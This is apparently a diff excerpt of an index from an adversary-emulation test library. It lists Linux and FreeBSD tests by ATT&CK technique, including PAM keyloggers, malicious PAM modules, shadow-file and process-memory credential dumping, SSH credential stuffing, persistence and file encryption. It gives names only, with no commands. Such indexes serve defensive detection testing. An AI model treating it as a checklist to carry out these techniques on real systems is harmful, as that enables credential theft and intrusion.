persistence,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
|
||||
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
|
||||
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
|
||||
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
|
||||
command-and-control,T1090.003,Proxy: Multi-hop Proxy,5,Tor Proxy Usage - FreeBSD,550ec67d-a99e-408b-816a-689271b27d2a,sh
|
||||
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
|
||||
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
|
||||
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
|
||||
@@ -162,31 +217,44 @@ collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compress
|
||||
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
|
||||
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
|
||||
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
|
||||
collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh
|
||||
collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
|
||||
collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh
|
||||
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
|
||||
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
|
||||
collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
|
||||
collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
|
||||
collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
|
||||
collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
|
||||
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
|
||||
collection,T1074.001,Data Staged: Local Data Staging,3,Stage data from Discovery.sh (freebsd),4fca7b49-379d-4493-8890-d6297750fa46,sh
|
||||
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
|
||||
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
|
||||
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
|
||||
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
|
||||
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
|
||||
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
|
||||
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,2,Sudo usage (freebsd),2bf9a018-4664-438a-b435-cc6f8c6f71b1,sh
|
||||
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,3,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
|
||||
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,4,Unlimited sudo cache timeout (freebsd),a83ad6e8-6f24-4d7f-8f44-75f8ab742991,sh
|
||||
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,5,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
|
||||
privilege-escalation,T1548.003,Abuse Elevation Control Mechanism: Sudo and Sudo Caching,6,Disable tty_tickets for sudo caching (freebsd),4df6a0fe-2bdd-4be8-8618-a6a19654a57a,sh
|
||||
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
|
||||
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
|
||||
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,3,Cron - Add script to /etc/cron.d folder,078e69eb-d9fb-450e-b9d0-2e118217c846,sh
|
||||
privilege-escalation,T1053.003,Scheduled Task/Job: Cron,4,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,1,Trap EXIT,a74b2e07-5952-4c03-8b56-56274b076b61,sh
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,2,Trap EXIT (freebsd),be1a5d70-6865-44aa-ab50-42244c9fd16f,sh
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,3,Trap SIGINT,a547d1ba-1d7a-4cc5-a9cb-8d65e8809636,sh
|
||||
privilege-escalation,T1546.005,Event Triggered Execution: Trap,4,Trap SIGINT (freebsd),ade10242-1eac-43df-8412-be0d4c704ada,sh
|
||||
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
|
||||
privilege-escalation,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Make and modify binary from C source (freebsd),dd580455-d84b-481b-b8b0-ac96f3b1dc4c,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Set a SetUID flag on file (freebsd),9be9b827-ff47-4e1b-bef8-217db6fb7283,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Set a SetGID flag on file (freebsd),1f73af33-62a8-4bf1-bd10-3bea931f2c0d,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,8,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
|
||||
privilege-escalation,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,9,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
|
||||
@@ -197,31 +265,45 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use
|
||||
privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,3,Add command to .shrc,41502021-591a-4649-8b6e-83c9192aff53,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,4,Append to the system shell profile,694b3cc8-6a78-4d35-9e74-0123d009e94b,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,5,Append commands user shell profile,bbdb06bc-bab6-4f5b-8232-ba3fbed51d77,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,6,System shell profile scripts,8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4,sh
|
||||
privilege-escalation,T1546.004,Event Triggered Execution: .bash_profile .bashrc and .shrc,7,Create/Append to .bash_logout,37ad2f24-7c53-4a50-92da-427a4ad13f58,bash
|
||||
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
|
||||
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
|
||||
privilege-escalation,T1037.004,Boot or Logon Initialization Scripts: Rc.common,4,rc.local (FreeBSD),2015fb48-8ab6-4fbf-928b-0b62de5c9476,sh
|
||||
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
|
||||
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,2,Create SysV Service,760fe8d2-79d9-494f-905e-a239a3df86f6,sh
|
||||
privilege-escalation,T1543.002,Create or Modify System Process: SysV/Systemd Service,3,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
|
||||
privilege-escalation,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
|
||||
privilege-escalation,T1053.002,Scheduled Task/Job: At,3,At - Schedule a job freebsd,549863fb-1c91-467e-97fc-1fa32b9f356b,sh
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,8,Create local account (Linux),02a91c34-8a5b-4bed-87af-501103eb5357,bash
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,9,Create local account (FreeBSD),95158cc9-8f6d-4889-9531-9be3f7f095e0,sh
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,10,Reactivate a locked/expired account (Linux),d2b95631-62d7-45a3-aaef-0972cea97931,bash
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,11,Reactivate a locked/expired account (FreeBSD),09e3380a-fae5-4255-8b19-9950be0252cf,sh
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,12,Login as nobody (Linux),3d2cd093-ee05-41bd-a802-59ee5c301b85,bash
|
||||
privilege-escalation,T1078.003,Valid Accounts: Local Accounts,13,Login as nobody (freebsd),16f6374f-7600-459a-9b16-6a88fd96d310,sh
|
||||
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
|
||||
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
|
||||
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
|
||||
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
|
||||
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
|
||||
credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
|
||||
credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
|
||||
credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
|
||||
credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
|
||||
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
|
||||
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
|
||||
credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with sh on FreeBSD (Local),fa37b633-e097-4415-b2b8-c5bf4c86e423,sh
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
|
||||
credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,4,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
|
||||
credential-access,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
credential-access,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
|
||||
credential-access,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
|
||||
credential-access,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
|
||||
credential-access,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
|
||||
credential-access,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
|
||||
credential-access,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
|
||||
@@ -230,14 +312,20 @@ credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data
|
||||
credential-access,T1555.003,Credentials from Password Stores: Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,4,Copy Private SSH Keys with CP (freebsd),12e4a260-a7fd-4ed8-bf18-1a28c1395775,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,5,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,6,Copy Private SSH Keys with rsync (freebsd),922b1080-0b95-42b0-9585-b9a5ea0af044,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,7,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
|
||||
credential-access,T1552.004,Unsecured Credentials: Private Keys,8,Copy the users GnuPG directory with rsync (freebsd),b05ac39b-515f-48e9-88e9-2f141b5bcad0,sh
|
||||
credential-access,T1552.003,Unsecured Credentials: Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
|
||||
credential-access,T1552.003,Unsecured Credentials: Bash History,2,Search Through sh History,d87d3b94-05b4-40f2-a80f-99864ffa6803,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,1,Find AWS credentials,2b93758e-a8d7-4e3b-bc7b-d3aa8d7ecb17,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,3,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
|
||||
credential-access,T1552.001,Unsecured Credentials: Credentials In Files,6,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
|
||||
credential-access,T1110.004,Brute Force: Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
|
||||
credential-access,T1110.004,Brute Force: Credential Stuffing,3,SSH Credential Stuffing From FreeBSD,a790d50e-7ebf-48de-8daa-d9367e0911d4,sh
|
||||
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
|
||||
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",2,Access /etc/master.passwd (Local),5076874f-a8e6-4077-8ace-9e5ab54114a5,sh
|
||||
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",3,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
|
||||
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",4,"Access /etc/{shadow,passwd,master.passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,sh
|
||||
credential-access,T1003.008,"OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow",5,"Access /etc/{shadow,passwd,master.passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,sh
|
||||
@@ -248,30 +336,42 @@ discovery,T1087.001,Account Discovery: Local Account,2,View sudoers access,fed9b
|
||||
discovery,T1087.001,Account Discovery: Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,4,List opened files by user,7e46c7a5-0142-45be-a858-1a3ecb4fd3cb,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,5,Show if a user account has ever logged in remotely,0f0b6a29-08c3-44ad-a30b-47fd996b2110,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,6,Show if a user account has ever logged in remotely (freebsd),0f73418f-d680-4383-8a24-87bc97fe4e35,sh
|
||||
discovery,T1087.001,Account Discovery: Local Account,7,Enumerate users and groups,e6f36545-dc1e-47f0-9f48-7f730f54a02e,sh
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
|
||||
discovery,T1497.001,Virtualization/Sandbox Evasion: System Checks,2,Detect Virtualization Environment (FreeBSD),e129d73b-3e03-4ae9-bf1e-67fc8921e0fd,sh
|
||||
discovery,T1069.002,Permission Groups Discovery: Domain Groups,15,Active Directory Domain Search Using LDAP - Linux (Ubuntu)/macOS,d58d749c-4450-4975-a9e9-8b1d562755c2,sh
|
||||
discovery,T1007,System Service Discovery,3,System Service Discovery - systemctl,f4b26bce-4c2c-46c0-bcc5-fce062d38bef,bash
|
||||
discovery,T1007,System Service Discovery,4,System Service Discovery - service,b2e1c734-7336-40f9-b970-b04731cbaf8a,sh
|
||||
discovery,T1040,Network Sniffing,1,Packet Capture Linux using tshark or tcpdump,7fe741f7-b265-4951-a7c7-320889083b3e,bash
|
||||
discovery,T1040,Network Sniffing,2,Packet Capture FreeBSD using tshark or tcpdump,c93f2492-9ebe-44b5-8b45-36574cccfe67,sh
|
||||
discovery,T1040,Network Sniffing,10,Packet Capture FreeBSD using /dev/bpfN with sudo,e2028771-1bfb-48f5-b5e6-e50ee0942a14,sh
|
||||
discovery,T1040,Network Sniffing,11,Filtered Packet Capture FreeBSD using /dev/bpfN with sudo,a3a0d4c9-c068-4563-a08d-583bd05b884c,sh
|
||||
discovery,T1040,Network Sniffing,12,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo",10c710c9-9104-4d5f-8829-5b65391e2a29,bash
|
||||
discovery,T1040,Network Sniffing,13,"Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo",7a0895f0-84c1-4adf-8491-a21510b1d4c1,bash
|
||||
discovery,T1040,Network Sniffing,14,"Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo",515575ab-d213-42b1-aa64-ef6a2dd4641b,bash
|
||||
discovery,T1040,Network Sniffing,15,"Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo",b1cbdf8b-6078-48f5-a890-11ea19d7f8e9,bash
|
||||
discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
|
||||
discovery,T1135,Network Share Discovery,3,Network Share Discovery - FreeBSD,77e468a6-3e5c-45a1-9948-c4b5603747cb,sh
|
||||
discovery,T1082,System Information Discovery,3,List OS Information,cccb070c-df86-4216-a5bc-9fb60c74e27c,sh
|
||||
discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware,31dad7ad-2286-4c02-ae92-274418c85fec,bash
|
||||
discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules,8057d484-0fae-49a4-8302-4812c4f1e64e,bash
|
||||
discovery,T1082,System Information Discovery,6,FreeBSD VM Check via Kernel Modules,eefe6a49-d88b-41d8-8fc2-b46822da90d3,sh
|
||||
discovery,T1082,System Information Discovery,8,Hostname Discovery,486e88ea-4f56-470f-9b57-3f4d73f39133,sh
|
||||
discovery,T1082,System Information Discovery,12,"Environment variables discovery on freebsd, macos and linux",fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
|
||||
discovery,T1082,System Information Discovery,25,Linux List Kernel Modules,034fe21c-3186-49dd-8d5d-128b35f181c7,sh
|
||||
discovery,T1082,System Information Discovery,26,FreeBSD List Kernel Modules,4947897f-643a-4b75-b3f5-bed6885749f6,sh
|
||||
discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Database Files on FreeBSD/Linux,3a41f169-a5ab-407f-9269-abafdb5da6c2,sh
|
||||
discovery,T1217,Browser Bookmark Discovery,4,List Google Chromium Bookmark JSON Files on FreeBSD,88ca025b-3040-44eb-9168-bd8af22b82fa,sh
|
||||
discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery,c141bbdb-7fca-4254-9fd6-f47e79447e17,sh
|
||||
discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (freebsd),7625b978-4efd-47de-8744-add270374bee,sh
|
||||
discovery,T1083,File and Directory Discovery,3,Nix File and Directory Discovery,ffc8b249-372a-4b74-adcd-e4c0430842de,sh
|
||||
discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery 2,13c5e1ae-605b-46c4-a79f-db28c77ff24e,sh
|
||||
discovery,T1049,System Network Connections Discovery,3,"System Network Connections Discovery FreeBSD, Linux & MacOS",9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2,sh
|
||||
discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
|
||||
discovery,T1069.001,Permission Groups Discovery: Local Groups,1,Permission Groups Discovery (Local),952931a4-af0b-4335-bbbe-73c8c5b327ae,sh
|
||||
discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
|
||||
discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - FreeBSD,a7893624-a3d7-4aed-9676-80498f31820f,sh
|
||||
discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
|
||||
discovery,T1201,Password Policy Discovery,4,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
|
||||
discovery,T1201,Password Policy Discovery,5,Examine password expiration policy - All Linux,7c86c55c-70fa-4a05-83c9-3aa19b145d1a,bash
|
||||
@@ -280,13 +380,16 @@ discovery,T1614.001,System Location Discovery: System Language Discovery,4,Disco
|
||||
discovery,T1614.001,System Location Discovery: System Language Discovery,5,Discover System Language by locale file,5d7057c9-2c8a-4026-91dd-13b5584daa69,sh
|
||||
discovery,T1614.001,System Location Discovery: System Language Discovery,6,Discover System Language by Environment Variable Query,cb8f7cdc-36c4-4ed0-befc-7ad7d24dfd7a,sh
|
||||
discovery,T1518.001,Software Discovery: Security Software Discovery,4,Security Software Discovery - ps (Linux),23b91cd2-c99c-4002-9e41-317c63e024a2,sh
|
||||
discovery,T1518.001,Software Discovery: Security Software Discovery,5,Security Software Discovery - pgrep (FreeBSD),fa96c21c-5fd6-4428-aa28-51a2fbecdbdc,sh
|
||||
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
|
||||
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
|
||||
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
|
||||
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
|
||||
discovery,T1018,Remote System Discovery,14,Remote System Discovery - netstat,d2791d72-b67f-4615-814f-ec824a91f514,sh
|
||||
discovery,T1018,Remote System Discovery,15,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
|
||||
discovery,T1046,Network Service Discovery,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
|
||||
discovery,T1046,Network Service Discovery,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
|
||||
discovery,T1046,Network Service Discovery,3,Port Scan Nmap for FreeBSD,f03d59dc-0e3b-428a-baeb-3499552c7048,sh
|
||||
impact,T1531,Account Access Removal,4,Change User Password via passwd,3c717bf3-2ecc-4d79-8ac8-0bfbf08fbce6,sh
|
||||
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (FreeBSD/Linux),7b8ce084-3922-4618-8d22-95f996173765,sh
|
||||
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (FreeBSD/Linux),53e6735a-4727-44cc-b35b-237682a151ad,sh
|
||||
@@ -298,11 +401,14 @@ impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - FreeBSD/ma
|
||||
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - FreeBSD/macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,sh
|
||||
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - FreeBSD/macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,sh
|
||||
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - FreeBSD/Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,sh
|
||||
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - FreeBSD,7b1cee42-320f-4890-b056-d65c8b884ba5,sh
|
||||
impact,T1529,System Shutdown/Reboot,8,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
|
||||
impact,T1529,System Shutdown/Reboot,9,Shutdown System via `poweroff` - FreeBSD/Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,sh
|
||||
impact,T1529,System Shutdown/Reboot,10,Reboot System via `poweroff` - FreeBSD,5a282e50-86ff-438d-8cef-8ae01c9e62e1,sh
|
||||
impact,T1529,System Shutdown/Reboot,11,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
|
||||
execution,T1053.003,Scheduled Task/Job: Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,sh
|
||||
